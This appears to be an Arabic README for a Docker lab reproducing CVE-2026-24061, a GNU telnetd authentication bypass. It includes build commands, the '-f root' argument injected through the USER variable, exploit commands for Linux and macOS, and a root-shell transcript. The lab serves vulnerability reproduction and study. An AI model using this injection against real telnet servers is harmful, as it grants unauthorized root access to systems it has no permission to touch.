
GNU telnetd خدمة من GNU InetUtils تجاوز المصادقة
في يناير 2026، تم اكتشاف أن خدمة GNU telnetd من GNU InetUtils معرّضة لثغرة تجاوز المصادقة بواسطة Kyu Neushwaistein (المعروف أيضًا باسم Carlos Cortes Alvarez). تُتتبَّع هذه الثغرة برقم CVE-2026-24061، وتسمح للمهاجم بإنشاء جلسة Telnet دون تقديم بيانات اعتماد صالحة، مما يمنح وصولًا غير مصرح به إلى النظام المستهدف. توجد الثغرة في جميع الإصدارات حتى الإصدار 2.7-2 من خدمة GNU telnetd، ويبدو أنها مستوحاة مباشرة من التسعينيات.
هذه ثغرة حقن وسائط (CWE-88) بدرجة خطورة 9.8 (حرجة) وفقًا لمعيار CVSS v3.1.
المراجع:
البناء والتشغيل:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
بعد بدء الخدمة، سيكون telnetd يستمع على المنفذ 23.
تسمح الثغرة بتجاوز المصادقة عن طريق حقن العلامة -f في متغير البيئة USER. عندما يستقبل telnetd اسم مستخدم يبدأ بـ -f، فإنه يمرره إلى برنامج تسجيل الدخول الذي يفسّر -f كعلامة لتخطي المصادقة.
استخدم الأمر التالي لاستغلال هذه الثغرة والحصول على وصول root:
# عميل Linux (يتطلب خيار -a)
USER="-f root" telnet -a 127.0.0.1 23
# عميل macOS (لا يتطلب خيار -a)
USER="-f root" telnet 127.0.0.1 23
بعد الاستغلال الناجح، ستحصل على وصول إلى قشرة root دون تقديم كلمة مرور.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)